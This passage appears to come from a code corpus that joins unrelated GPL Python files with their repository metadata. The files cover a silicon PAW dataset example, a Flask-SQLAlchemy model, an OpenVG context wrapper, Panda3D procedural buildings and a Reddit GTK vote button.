                                          kappa = computeSeq.kappa())
            newSeqData.save()
            newSequence.seqProc = True
            newSequence.save()
|
panda4life/idpserver
|
mysite/idp/forms.py
|
Python
|
gpl-3.0
| 20,697
|
from pyatompaw import AtompawMaster
# Example: build a PAW atomic dataset for silicon with atompaw.
# Atom definition
atom = AtompawMaster('14-Si')
atom.Atom_name = 'Si'
atom.Z = 14
# Keywords
atom.XC_functional = 'LDA-PW'
atom.projector_keyword = 'custom'
# (label, Emin, Emax, number of points) -- confirm against pyatompaw docs.
atom.logderivrange = 'logderivrange', -6, 10, 2001
atom.ps_scheme = 'rrjk'
atom.ortho_scheme = 'gramschmidtortho'
atom.Vloc_scheme = 'trouillermartins'
atom.lloc = 2
atom.Eloc = 0.5
atom.output_format = 'abinit'
# Atom configuration
atom.nmax = [3, 3, 0, 0, 0, 0] # Maximum occupied orbitals: 3s 3p
atom.occ = [(3,1,2)] # 3p has partiall occ: 2
atom.lmax = 2
# PAW augmentation radius (also used as the projector cutoff below).
atom.rpaw = 1.6
# Projectors for valence states
atom.add_valence(n=3, l=0, rc=atom.rpaw)
atom.add_valence(n=3, l=1, rc=atom.rpaw)
# Additional projectors
atom.add_proj(l=0, Eref=12.0, rc=atom.rpaw)
atom.add_proj(l=1, Eref=12.0, rc=atom.rpaw)
atom.add_proj(l=2, Eref=5.0, rc=atom.rpaw)
# Execution
atom.make() # Write the files
atom.run() # Run atompaw
# Plot partial waves and logarithmic derivatives.
atom.plot_wfn()
atom.show_wfn()
atom.plot_logderiv(show=True)
# Export the atomic dataset
atom.export('.')
|
GkAntonius/pyatompaw
|
examples/Si.py
|
Python
|
gpl-3.0
| 1,075
|
from backend import db
class Institution(db.Model):
    """An institution row: identification data plus its related programs."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(250))
    abbreviation = db.Column(db.String(20))
    # cnpj: Brazilian company registry identifier; must be unique.
    cnpj = db.Column(db.String(18), unique=True)
    address = db.Column(db.String(250))
    current_program_section = db.Column(db.String(6))
    programs = db.relationship('Program', backref='institution', lazy='dynamic')

    def set_fields(self, fields):
        """Copy every writable attribute from *fields*.

        Raises KeyError if any expected key is missing (same behaviour as
        the original explicit assignments).
        """
        for attr in ('name', 'abbreviation', 'cnpj',
                     'address', 'current_program_section'):
            setattr(self, attr, fields[attr])
|
sandroandrade/emile-server
|
cruds/crud_institution/models.py
|
Python
|
gpl-3.0
| 680
|
# -*- coding: utf-8 -*-
'''
Mepinta
Copyright (c) 2011-2012, Joaquin G. Duo
This file is part of Mepinta.
Mepinta is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mepinta is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mepinta. If not, see <http://www.gnu.org/licenses/>.
'''
from mepinta.plugins_manifest import ProcessorManifestBase, DataProperty, FunctionProperty
class bitmap_checker(ProcessorManifestBase):
    # build = False: presumably tells the plugin system to skip building this
    # (still skeletal) processor -- confirm against ProcessorManifestBase.
    build = False
    def define(self, inputs, internals, functions, outputs):
        """Declare the processor's properties (template left unfilled)."""
        # inputs. = DataProperty('')
        # outputs. = DataProperty('')
        # functions. = FunctionProperty()
        pass
    # functions..dpdencies += [inputs.,]
    # outputs..dpdencies += [functions.]
# Export hook: the name the plugin loader presumably looks up -- confirm.
manifest = bitmap_checker
if __name__ == "__main__":
    pass
|
joaduo/mepinta
|
plugins/c_and_cpp/k3dv1/plugins/c_and_cpp/processors/k3dv1/bitmap/generators/bitmap_checker/bitmap_checker__0001.py
|
Python
|
gpl-3.0
| 1,211
|
#!/usr/bin/env python3
'''OpenVG context access.'''
# Copyright © 2013-14 Tim Pederick.
#
# This file is part of Povg.
#
# Povg is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Povg is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Povg. If not, see <http://www.gnu.org/licenses/>.
__all__ = ['MatrixMode', 'FillRule', 'ImageQuality', 'RenderingQuality',
'BlendMode', 'ImageMode', 'CapStyle', 'JoinStyle', 'PixelLayout',
'Context']
# Standard library imports.
from collections import namedtuple
from ctypes import c_float, c_int
# Local library imports.
from .. import flatten, unflatten
from ..native import (vgFlush, vgFinish, vgSeti, vgSetf, vgSetiv, vgSetfv,
vgGetVectorSize, vgGeti, vgGetf, vgGetiv, vgGetfv,
c_int_p, c_float_p)
# Context parameter types.
# Maps each VG_* context-parameter name (sans the VG_ prefix) to its native
# VGParamType token; keys here are the strings accepted by _get/_getv below.
_params = {
    # Mode settings
    'MATRIX_MODE': 0x1100,
    'FILL_RULE': 0x1101,
    'IMAGE_QUALITY': 0x1102,
    'RENDERING_QUALITY': 0x1103,
    'BLEND_MODE': 0x1104,
    'IMAGE_MODE': 0x1105,
    # Alpha masking and scissoring
    'MASKING': 0x1130,
    'SCISSORING': 0x1131,
    'SCISSOR_RECTS': 0x1106,
    # Colour transformation
    'COLOR_TRANSFORM': 0x1170,
    'COLOR_TRANSFORM_VALUES': 0x1171,
    # Stroke parameters
    'STROKE_LINE_WIDTH': 0x1110,
    'STROKE_CAP_STYLE': 0x1111,
    'STROKE_JOIN_STYLE': 0x1112,
    'STROKE_MITER_LIMIT': 0x1113,
    # Stroke dash parameters
    'STROKE_DASH_PATTERN': 0x1114,
    'STROKE_DASH_PHASE': 0x1115,
    'STROKE_DASH_PHASE_RESET': 0x1116,
    # Fill and clear colours
    'TILE_FILL_COLOR': 0x1120,
    'CLEAR_COLOR': 0x1121,
    # Glyph origin
    'GLYPH_ORIGIN': 0x1122,
    # Pixel layout information
    'PIXEL_LAYOUT': 0x1140,
    'SCREEN_LAYOUT': 0x1141,
    # Filter settings
    'FILTER_FORMAT_LINEAR': 0x1150,
    'FILTER_FORMAT_PREMULTIPLIED': 0x1151,
    'FILTER_CHANNEL_MASK': 0x1152,
    # Read-only implementation limits
    'MAX_SCISSOR_RECTS': 0x1160,
    'MAX_DASH_COUNT': 0x1161,
    'MAX_KERNEL_SIZE': 0x1162,
    'MAX_SEPARABLE_KERNEL_SIZE': 0x1163,
    'MAX_COLOR_RAMP_STOPS': 0x1164,
    'MAX_IMAGE_WIDTH': 0x1165,
    'MAX_IMAGE_HEIGHT': 0x1166,
    'MAX_IMAGE_PIXELS': 0x1167,
    'MAX_IMAGE_BYTES': 0x1168,
    'MAX_FLOAT': 0x1169,
    'MAX_GAUSSIAN_STD_DEVIATION': 0x116A}
# Context parameter values.
# Context parameter values.
# Each constant group is an immutable named-tuple instance: attribute access
# yields the native OpenVG enum value (e.g. MatrixMode.PATH_USER_TO_SURFACE).
def _enum_ns(typename, fields, values):
    """Build an immutable namespace of OpenVG enum values."""
    return namedtuple(typename, fields)(*values)

MatrixMode = _enum_ns('MatrixMode_tuple',
                      ('PATH_USER_TO_SURFACE', 'IMAGE_USER_TO_SURFACE',
                       'FILL_PAINT_TO_USER', 'STROKE_PAINT_TO_USER',
                       'GLYPH_USER_TO_SURFACE'),
                      (0x1400, 0x1401, 0x1402, 0x1403, 0x1404))
FillRule = _enum_ns('FillRule_tuple',
                    ('EVEN_ODD', 'NON_ZERO'),
                    (0x1900, 0x1901))
ImageQuality = _enum_ns('ImageQuality_tuple',
                        ('NON_ANTIALIASED', 'FASTER', 'BETTER'),
                        (1, 2, 4))  # TODO: Bitmask values!
RenderingQuality = _enum_ns('RenderQuality_tuple',
                            ('NON_ANTIALIASED', 'FASTER', 'BETTER'),
                            (0x1200, 0x1201, 0x1202))
BlendMode = _enum_ns('BlendMode_tuple',
                     ('SRC', 'SRC_OVER', 'DST_OVER', 'SRC_IN', 'DST_IN',
                      'MULTIPLY', 'SCREEN', 'DARKEN', 'LIGHTEN', 'ADDITIVE'),
                     (0x2000, 0x2001, 0x2002, 0x2003, 0x2004,
                      0x2005, 0x2006, 0x2007, 0x2008, 0x2009))
ImageMode = _enum_ns('ImageMode_tuple',
                     ('NORMAL', 'MULTIPLY', 'STENCIL'),
                     (0x1F00, 0x1F01, 0x1F02))
CapStyle = _enum_ns('CapStyle_tuple',
                    ('BUTT', 'ROUND', 'SQUARE'),
                    (0x1700, 0x1701, 0x1702))
JoinStyle = _enum_ns('JoinStyle_tuple',
                     ('MITER', 'ROUND', 'BEVEL'),
                     (0x1800, 0x1801, 0x1802))
PixelLayout = _enum_ns('PixelLayout_tuple',
                       ('UNKNOWN', 'RGB_VERTICAL', 'BGR_VERTICAL',
                        'RGB_HORIZONTAL', 'BGR_HORIZONTAL'),
                       (0x1300, 0x1301, 0x1302, 0x1303, 0x1304))
# Context parameter getter/setter factories.
def _get_vector(param_id, type_=int, flattened=False, known_size=None):
    '''Dynamically create a getter function for a vector parameter.

    The functions thus created have all implementation details built in
    when created (somewhat like currying a function), and accept one
    argument, called self. They are thus suitable for use as getter
    methods for properties.

    Keyword arguments:
        param_id -- The integer value that is passed to the native
            function to identify the parameter in question.
        type_ -- The data type stored in this vector. OpenVG only
            directly allows integer or floating-point parameters. (It
            also has boolean parameters, represented by integers, but no
            parameter is currently defined as a vector of booleans.) If
            this argument is set to something other than float, OpenVG
            will provide an integer which will then be converted to the
            supplied type. If omitted, the default is int.
        flattened -- Whether or not the values are actually sequences of
            vectors that need to be "unflattened" after reading. The
            default is False; if True, known_size needs to be set.
        known_size -- The fixed size of this vector, if it has one. If
            omitted or None, the vector will be dynamically sized each
            time it is read. If flattened is True, the size applies to
            each vector in the sequence, not the sequence itself.

    '''
    # Get the native function and pointer type needed.
    getv_fn, c_itemtype = ((vgGetfv, c_float) if type_ is float else
                           (vgGetiv, c_int))
    # Construct the getter function, with the above details baked in.
    if flattened:
        if known_size is None:
            raise TypeError('known_size must be supplied if flattened is True')
        def getter(self):
            # The total element count is always queried, since the number
            # of sub-vectors in the sequence can vary between reads.
            size = vgGetVectorSize(param_id)
            array = (c_itemtype * size)()
            getv_fn(param_id, size, array)
            # Regroup the flat native array into known_size-length vectors.
            return unflatten((type_(elem) for elem in array), known_size)
    else:
        # Create a function that either returns the static size (if we know
        # what that is) or fetches the current size when called.
        sizer = ((lambda: known_size) if known_size is not None else
                 (lambda: vgGetVectorSize(param_id)))
        def getter(self):
            size = sizer()
            array = (c_itemtype * size)()
            getv_fn(param_id, size, array)
            return tuple(type_(elem) for elem in array)
    return getter
def _set_vector(param_id, type_=int, flattened=False, known_size=None):
    '''Dynamically create a setter function for a vector parameter.

    The functions thus created have all implementation details built in
    when created (somewhat like currying a function), and accept two
    argument, called self and val. They are thus suitable for use as
    setter methods for properties.

    Keyword arguments:
        param_id -- The integer value that is passed to the native
            function to identify the parameter in question.
        type_ -- The data type stored in this vector. OpenVG only
            directly allows integer or floating-point parameters. (It
            also has boolean parameters, represented by integers, but no
            parameter is currently defined as a vector of booleans.) If
            this argument is set to something other than float, ctypes
            will convert the values to integers and call the native
            functions that handle integers.
        flattened -- Whether or not the values are actually sequences of
            vectors that need to be flattened before writing. The
            default is False.
        known_size -- The fixed size of this vector, if it has one. This
            parameter is ignored (and the actual len() of the value
            supplied is used) unless flattened is True, in which case
            the value applies to each vector in the sequence.

    '''
    # Get the native function and pointer type needed.
    setv_fn, c_itemtype = ((vgSetfv, c_float) if type_ is float else
                           (vgSetiv, c_int))
    # Construct the setter function, with the above details baked in.
    if flattened:
        def setter(self, val):
            # Collapse the sequence of vectors into one flat native array;
            # known_size lets flatten() validate each sub-vector's length.
            flat = flatten(val, known_size)
            size = len(flat)
            array = (c_itemtype * size)(*flat)
            setv_fn(param_id, size, array)
    else:
        def setter(self, val):
            size = len(val)
            array = (c_itemtype * size)(*val)
            setv_fn(param_id, size, array)
    return setter
def _get(param, name, values, type_=int, from_nt=None):
    '''Create a read-only property with a scalar value.

    Keyword arguments:
        param -- A key from _params identifying the context parameter.
        name -- A human-readable name for the property.
        values -- A human-readable description of the values this
            property can have. Ignored if type_ is bool.
        type_ -- The type of this property. OpenVG only directly allows
            integer or floating-point parameters, although it also has
            boolean parameters represented by integers. If this argument
            is set to something other than float, OpenVG will provide an
            integer which will then be converted to the supplied type.
            If omitted, the default is int.
        from_nt -- An optional named tuple instance from which values
            must be drawn.

    '''
    # TODO: Do something useful with from_nt.
    pid = _params[param]
    native_get = vgGetf if type_ is float else vgGeti
    # Boolean parameters get a yes/no docstring; everything else lists
    # the possible values.
    if type_ is bool:
        docstring = 'Whether or not {} (read-only).\n'.format(name)
    else:
        docstring = ('The {} (read-only).\n\n    Possible values are '
                     '{}.\n'.format(name, values))
    return property(fget=lambda self: type_(native_get(pid)),
                    doc=docstring)
def _getv(param, name, values, type_=int, flattened=False, known_size=None):
    '''Create a read-only property with a vector value.

    Keyword arguments:
        param -- A key from _params identifying the context parameter.
        name -- A human-readable name for the property.
        values -- A human-readable description of the values this
            property can have.
        type_ -- The data type stored in this vector. OpenVG only
            directly allows integer or floating-point parameters. (It
            also has boolean parameters, represented by integers, but no
            parameter is currently defined as a vector of booleans.) If
            this argument is set to something other than float, OpenVG
            will provide an integer which will then be converted to the
            supplied type. If omitted, the default is int.
        flattened -- Whether or not the property is a sequence of
            vectors that needs to be "unflattened" after reading. If
            omitted, the default is False. If True, known_size must be
            specified.
        known_size -- The fixed size of this vector, if it has one. If
            omitted or None, the vector will be dynamically sized each
            time it is read. If flattened is True, this parameter is
            required, and specifies the size of each vector in the
            sequence, not of the sequence itself.

    '''
    param_id = _params[param]
    # _get_vector() returns a getter function that takes self, so it is
    # passed to property() directly as fget (as _getsetv does). The
    # previous code wrapped it in "lambda self: _get_vector(...)", which
    # made reading the property return the getter function object
    # itself rather than the parameter's values.
    return property(fget=_get_vector(param_id, type_, flattened,
                                     known_size),
                    doc=('The {} (read-only).\n\n'
                         '    Possible values are {}.\n'.format(name, values)))
def _getset(param, name, values, type_=int, from_nt=None):
    '''Create a read/write property with a scalar value.

    Keyword arguments:
        param -- A key from _params identifying the context parameter.
        name -- A human-readable name for the property.
        values -- A human-readable description of the values this
            property can take.
        type_ -- The type of this property. OpenVG only directly allows
            integer or floating-point parameters, although it also has
            boolean parameters represented by integers. If this argument
            is set to something other than float, OpenVG will provide an
            integer which will then be converted to the supplied type.
            If omitted, the default is int.
        from_nt -- An optional named tuple instance from which values
            must be drawn.

    '''
    # TODO: Do something useful with from_nt.
    pid = _params[param]
    # Select the native getter/setter pair and ctypes value type.
    if type_ is float:
        native_get, native_set, value_ctype = vgGetf, vgSetf, c_float
    else:
        native_get, native_set, value_ctype = vgGeti, vgSeti, c_int
    if type_ is bool:
        docstring = 'Whether or not {}.\n'.format(name)
    else:
        docstring = 'The {}.\n\n    Legal values are {}.\n'.format(name,
                                                                   values)
    return property(fget=lambda self: type_(native_get(pid)),
                    fset=lambda self, val: native_set(pid, value_ctype(val)),
                    doc=docstring)
def _getsetv(param, name, values, type_=int, flattened=False, known_size=None):
    '''Create a read/write property with a vector value.

    Keyword arguments:
        param -- A key from _params identifying the context parameter.
        name -- A human-readable name for the property.
        values -- A human-readable description of the values this
            property can take.
        type_ -- The type of this property. OpenVG only directly allows
            integer or floating-point parameters. (It also has boolean
            parameters represented by integers, but currently no vectors
            of booleans). If this argument is set to something other
            than float, OpenVG will provide an integer which will then
            be converted to the supplied type. If omitted, the default
            is int.
        flattened -- Whether or not the property is a sequence of
            vectors that needs to be flattened on write and restored on
            read. If omitted, the default is False.
        known_size -- The known size of the vector values of this
            property. If omitted or None, the size will be checked on
            each read and write. If flattened is True, this parameter is
            required, and specifies the size of each vector in the
            sequence, not of the sequence itself.

    '''
    pid = _params[param]
    # Both factory functions return closures suitable for property().
    getter = _get_vector(pid, type_, flattened, known_size)
    setter = _set_vector(pid, type_, flattened, known_size)
    doc = ('The {}.\n\n'
           '    Legal values are {}.\n'.format(name, values))
    return property(fget=getter, fset=setter, doc=doc)
# The OpenVG context itself.
class Context:
    '''Represents the OpenVG context.

    Because of the design of OpenVG, instances of this class will all
    access the same context state. It is therefore not generally useful
    to have more than one Context instance in use.

    Context attributes:
        matrix_mode
        fill_rule
        image_quality
        rendering_quality
        blend_mode
        image_mode
        scissor_rects
        color_transform
        color_transform_values
        stroke_line_width
        stroke_cap_style
        stroke_join_style
        stroke_miter_limit
        stroke_dash_pattern
        stroke_dash_phase
        stroke_dash_phase_reset
        tile_fill_color
        clear_color
        glyph_origin
        masking
        scissoring
        pixel_layout
        filter_format_linear
        filter_format_premult
        filter_channel_mask
    Read-only context attributes:
        screen_layout
        max_scissor_rects
        max_dash_count
        max_kernel_size
        max_separable_kernel_size
        max_gaussian_std_deviation
        max_color_ramp_stops
        max_image_width
        max_image_height
        max_image_pixels
        max_image_bytes
        max_float

    '''
    # Mode settings
    matrix_mode = _getset('MATRIX_MODE', 'transform matrix mode',
                          'contained in the MatrixMode named tuple',
                          from_nt=MatrixMode)
    fill_rule = _getset('FILL_RULE', 'path fill rule',
                        'contained in the FillRule named tuple',
                        from_nt=FillRule)
    image_quality = _getset('IMAGE_QUALITY', 'image resampling quality',
                            'contained in the ImageQuality named tuple',
                            from_nt=ImageQuality)
    rendering_quality = _getset('RENDERING_QUALITY',
                                'overall rendering quality',
                                'contained in the RenderingQuality '
                                'named tuple', from_nt=RenderingQuality)
    blend_mode = _getset('BLEND_MODE', 'blending mode (from a subset of '
                         'Porter-Duff modes, plus some extras) to apply',
                         'contained in the BlendMode named tuple',
                         from_nt=BlendMode)
    image_mode = _getset('IMAGE_MODE', 'image drawing method',
                         'contained in the ImageMode named tuple',
                         from_nt=ImageMode)
    # Alpha masking and scissoring
    masking = _getset('MASKING', 'masking is active',
                      'booleans', type_=bool)
    scissoring = _getset('SCISSORING', 'scissoring is active',
                         'booleans', type_=bool)
    scissor_rects = _getsetv('SCISSOR_RECTS', 'scissoring rectangles, which '
                             'bound the drawing surface when scissoring is '
                             'enabled',
                             '4-tuples of (x, y, width, height) for each '
                             'scissoring rectangle',
                             flattened=True, known_size=4)
    # Colour transformation
    # TODO: One property for both of these.
    color_transform = _getset('COLOR_TRANSFORM',
                              'colour transformation is active',
                              'booleans', type_=bool)
    color_transform_values = _getsetv('COLOR_TRANSFORM_VALUES', 'parameters '
                                      'of the colour transformation',
                                      'eight color components (red, green, '
                                      'blue, alpha for scale and for bias)',
                                      type_=float, known_size=8)
    # Stroke parameters
    # TODO: One property for all stroke parameters.
    stroke_line_width = _getset('STROKE_LINE_WIDTH', 'width of the stroke',
                                'non-negative floats', type_=float)
    stroke_cap_style = _getset('STROKE_CAP_STYLE', 'style of the stroke ends',
                               'contained in the CapStyle named tuple',
                               from_nt=CapStyle)
    stroke_join_style = _getset('STROKE_JOIN_STYLE', 'style of stroke joins',
                                'contained in the JoinStyle named tuple',
                                from_nt=JoinStyle)
    stroke_miter_limit = _getset('STROKE_MITER_LIMIT', 'miter length limit, '
                                 'past which miter joins are converted to '
                                 'bevel joins',
                                 'non-negative floats', type_=float)
    # Stroke dash parameters
    # TODO: One property for all dash parameters.
    stroke_dash_pattern = _getsetv('STROKE_DASH_PATTERN', 'series of "on" '
                                   'and "off" lengths in the dash pattern',
                                   'sequences of even numbers of floats (an '
                                   'empty sequence disables dashes)',
                                   type_=float)
    stroke_dash_phase = _getset('STROKE_DASH_PHASE', 'offset before the dash '
                                'pattern begins', 'floats', type_=float)
    stroke_dash_phase_reset = _getset('STROKE_DASH_PHASE_RESET',
                                      'reset the dash pattern on each subpath',
                                      'booleans', type_=bool)
    # Fill and clear colours
    tile_fill_color = _getsetv('TILE_FILL_COLOR', 'fill colour used for the '
                               'TILE_FILL tiling mode', '4-tuples of (R, G, B, '
                               'A) floats in the range [0, 1] (other values '
                               'will be clamped)', type_=float, known_size=4)
    clear_color = _getsetv('CLEAR_COLOR', 'colour used when fast-clearing '
                           'regions', '4-tuples of (R, G, B, A) floats in the '
                           'range [0, 1] (other values will be clamped)',
                           type_=float, known_size=4)
    # Glyph origin
    glyph_origin = _getsetv('GLYPH_ORIGIN', 'the current position of the '
                            'glyph "cursor"', '2-tuples of (x, y) floats',
                            type_=float, known_size=2)
    # Pixel layout information
    pixel_layout = _getset('PIXEL_LAYOUT', 'pixel geometry hint supplied to '
                           'the renderer', 'contained in the PixelLayout '
                           'named tuple', from_nt=PixelLayout)
    # This isn't specified as read-only, but the description implies it.
    screen_layout = _get('SCREEN_LAYOUT', 'pixel geometry of the current '
                         'display device', 'contained in the PixelLayout '
                         'named tuple', from_nt=PixelLayout)
    # Filter settings
    # TODO: One property for both filter source format conversions.
    filter_format_linear = _getset('FILTER_FORMAT_LINEAR', 'filter formats are '
                                   'converted to a linear colour space',
                                   'booleans', type_=bool)
    filter_format_premult = _getset('FILTER_FORMAT_PREMULTIPLIED', 'filter '
                                    'formats are converted to a premultiplied '
                                    'colour space', 'booleans', type_=bool)
    filter_channel_mask = _getset('FILTER_CHANNEL_MASK', 'colour channels of '
                                  'the filtered image to write', 'bitmasks of '
                                  'red, green, blue and alpha') # TODO: Bitmask!
    # Read-only implementation limits
    max_scissor_rects = _get('MAX_SCISSOR_RECTS', 'maximum number of '
                             'scissoring rectangles supported',
                             'positive integers (minimum 32)')
    max_dash_count = _get('MAX_DASH_COUNT', 'maximum number of dash segments '
                          'that may be specified',
                          'positive integers (minimum 16)')
    max_kernel_size = _get('MAX_KERNEL_SIZE', 'maximum kernel size (width '
                           'and/or height) for convolution',
                           'positive integers (minimum 7)')
    max_separable_kernel_size = _get('MAX_SEPARABLE_KERNEL_SIZE', 'maximum '
                                     'kernel size for separable convolution',
                                     'positive integers (minimum 15)')
    max_color_ramp_stops = _get('MAX_COLOR_RAMP_STOPS', 'maximum number of '
                                'gradient stops that may be specified',
                                'positive integers (minimum 32)')
    max_image_width = _get('MAX_IMAGE_WIDTH', 'maximum pixel width of images '
                           'and masks', 'positive integers (minimum 256)')
    max_image_height = _get('MAX_IMAGE_HEIGHT', 'maximum pixel height of '
                            'images and masks',
                            'positive integers (minimum 256)')
    max_image_pixels = _get('MAX_IMAGE_PIXELS', 'maximum number of pixels in '
                            'an image or mask',
                            'positive integers (minimum 65536)')
    max_image_bytes = _get('MAX_IMAGE_BYTES', 'maximum bytes of image data in '
                           'an image', 'positive integers (minimum 65536)')
    max_float = _get('MAX_FLOAT', 'largest floating-point number accepted by '
                     'this implementation', 'positive floating-point numbers '
                     '(minimum 1E+10)', type_=float)
    max_gaussian_std_deviation = _get('MAX_GAUSSIAN_STD_DEVIATION',
                                      'largest standard deviation accepted '
                                      'for Gaussian blur',
                                      'positive floating-point numbers '
                                      '(minimum 16.0)',
                                      type_=float)
    @staticmethod
    def flush():
        '''Force operations on the current context to finish.

        Calling this function will ensure that any outstanding operations
        will finish in finite time, but it will not block while waiting
        for completion of those operations.

        '''
        vgFlush()
    @staticmethod
    def finish():
        '''Force operations on the current context to finish.

        When called, this function will not return until all outstanding
        operations are complete.

        '''
        vgFinish()
|
perey/povg
|
povg/context/__init__.py
|
Python
|
gpl-3.0
| 25,961
|
from panda3d.core import (
Geom,
GeomNode,
GeomTristrips,
GeomVertexFormat,
GeomVertexData,
GeomVertexWriter,
Vec3,
)
from utils import center, lerp
class Level:
    '''One extruded storey: a triangle-strip wall around a border
    polygon, optionally capped with a ceiling strip.
    '''
    def __init__(self, border, top, cover=True):
        # V3c4: 3-float position plus 4-float colour per vertex.
        self.fmt = GeomVertexFormat.getV3c4()
        self.border = border
        self.top = top
        self.cover = cover
    def primitives(self, vdata):
        '''Yield the wall (and, if covered, ceiling) triangle strips,
        writing the vertex data into ``vdata`` as a side effect.
        '''
        pos_writer = GeomVertexWriter(vdata, 'vertex')
        col_writer = GeomVertexWriter(vdata, 'color')
        count = len(self.border)
        # Write the bottom ring (grey) then the top ring (white),
        # both in border order.
        for lift, shade in ((0.0, 0.5), (self.top, 1.0)):
            for pt in self.border:
                pos_writer.addData3f(pt.x, pt.y, pt.z + lift)
                col_writer.addData4f(shade, shade, shade, 0.0)
        # Wall: zig-zag between bottom vertex i and top vertex i + count,
        # then repeat the first pair to close the loop.
        wall = GeomTristrips(Geom.UHStatic)
        for i in range(count):
            wall.addVertices(i, i + count)
        wall.addVertices(0, count)
        wall.closePrimitive()
        yield wall
        # Ceiling: a strip over the top ring's vertices.
        if self.cover:
            ceiling = GeomTristrips(Geom.UHStatic)
            ceiling.addConsecutiveVertices(count, count)
            ceiling.addVertex(count)
            ceiling.closePrimitive()
            yield ceiling
    def geom(self):
        '''Build a Geom containing this level's vertices and strips.'''
        vdata = GeomVertexData('LevelVD', self.fmt, Geom.UHStatic)
        level_geom = Geom(vdata)
        for strip in self.primitives(vdata):
            level_geom.addPrimitive(strip)
        return level_geom
    def node(self):
        '''Wrap this level's geometry in a scene-graph node.'''
        wrapper = GeomNode('LevelNode')
        wrapper.addGeom(self.geom())
        return wrapper
class Building:
    '''A stack of Level storeys, each 2.5 units tall and progressively
    shrunk toward its centroid.
    '''
    def __init__(self, border, tops):
        self.border = border
        self.tops = tops
        self.levels = []
        # Only the number of entries in `tops` matters here: it sets
        # how many storeys are generated.
        for storey in range(len(tops)):
            ring = [Vec3(p.x, p.y, p.z + storey * 2.5) for p in self.border]
            centroid = center(ring)
            # Higher storeys are pulled slightly toward the centroid.
            ring = [lerp(p, centroid, 1 - 0.99 ** storey) for p in ring]
            self.levels.append(
                Level(border=ring, top=(storey + 1) * 2.5, cover=True))
    def node(self):
        '''Collect every storey's geometry under a single node.'''
        building_node = GeomNode('BuildingNode')
        for storey in self.levels:
            building_node.addGeom(storey.geom())
        return building_node
|
Alkxzv/procedural-city
|
buildings.py
|
Python
|
gpl-3.0
| 2,213
|
# Copyright 2016 Sam Parkinson <sam@sam.today>
#
# This file is part of Something for Reddit.
#
# Something for Reddit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Something for Reddit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Something for Reddit. If not, see <http://www.gnu.org/licenses/>.
import arrow
from gi.repository import Gtk
from gi.repository import Pango
from redditisgtk.palettebutton import connect_palette
from redditisgtk.api import RedditAPI
'''
So you come here and you ask, why are these ButtonBehaviours rather
than simple Gtk.Button subclasses? The answer is simple: we make
the uis via Gtk.Builder, and I can't seem to get Gtk.Builder.expose_object
to work from python. Also, if we use custom widgets, it will annoy
Glade probably.
'''
def make_label_shrinkable(label: Gtk.Label):
    '''
    Make a label shrinkable in the most aggressive way possible
    '''
    # Ellipsizing lets the label request less than its natural width,
    # so containers can shrink it with an "..." at the end.
    label.props.ellipsize = Pango.EllipsizeMode.END
class ScoreButtonBehaviour():
    '''Manage a button showing an item's score, with a voting palette.

    Keeps the button label, the "upvoted"/"downvoted" style classes and
    the cached item data in sync when the user votes.
    '''
    def __init__(self, api: RedditAPI, button, data):
        self._api = api
        self._button = button
        self._data = data
        self._p = connect_palette(button, self._make_score_palette)
        self._update_score_button()
    def _make_score_palette(self):
        # Build the popover containing up/no/down vote radio buttons.
        bb = Gtk.ButtonBox(orientation=Gtk.Orientation.VERTICAL,
                           layout_style=Gtk.ButtonBoxStyle.EXPAND)
        upvote = Gtk.RadioToolButton(icon_name='reddit-upvote-symbolic')
        upvote.get_style_context().add_class('upvote')
        bb.add(upvote)
        novote = Gtk.RadioToolButton(icon_name='reddit-novote-symbolic',
                                     group=upvote)
        bb.add(novote)
        downvote = Gtk.RadioToolButton(icon_name='reddit-downvote-symbolic',
                                       group=upvote)
        downvote.get_style_context().add_class('downvote')
        bb.add(downvote)
        bb.show_all()
        # 'likes' is True/False/None for an up/down/no existing vote.
        if self._data.get('likes') is True:
            upvote.props.active = True
        elif self._data.get('likes') is False:
            downvote.props.active = True
        else:
            novote.props.active = True
        # Connect only after the initial state is set, so restoring the
        # current vote does not re-submit it.
        upvote.connect('toggled', self.__vote_toggled_cb, +1)
        novote.connect('toggled', self.__vote_toggled_cb, 0)
        downvote.connect('toggled', self.__vote_toggled_cb, -1)
        palette = Gtk.Popover()
        palette.add(bb)
        return palette
    def vote(self, direction):
        '''Submit a vote (+1, 0 or -1) and update the cached score.'''
        self._api.vote(self._data['name'], direction)
        # Adjust the score optimistically, first undoing any prior vote.
        # Use .get for 'likes' to match _make_score_palette, which
        # treats the key as optional.
        new_score = self._data['score'] + direction
        if self._data.get('likes') is True:
            new_score -= 1  # Undo the previous like
        elif self._data.get('likes') is False:
            new_score += 1
        if direction == 0:
            likes = None
        elif direction == +1:
            likes = True
        elif direction == -1:
            likes = False
        self._data['likes'] = likes
        self._data['score'] = new_score
        self._update_score_button()
    def __vote_toggled_cb(self, toggle, direction):
        # Each toggle fires for both the activated and deactivated
        # button; only act on the one becoming active.
        if toggle.props.active:
            self.vote(direction)
    def _update_score_button(self):
        # Refresh the label text and vote-direction style classes.
        score = self._data['score']
        likes = self._data.get('likes')
        hidden = self._data.get('score_hidden')
        score_string = 'score hidden' if hidden else '{}p'.format(score)
        self._button.props.label = score_string
        ctx = self._button.get_style_context()
        ctx.remove_class('upvoted')
        ctx.remove_class('downvoted')
        if likes is True:
            ctx.add_class('upvoted')
        elif likes is False:
            ctx.add_class('downvoted')
        make_label_shrinkable(self._button.get_child())
        # 'gilded' may be absent; default to 0 so the comparison does
        # not raise TypeError (None > 0) on Python 3.
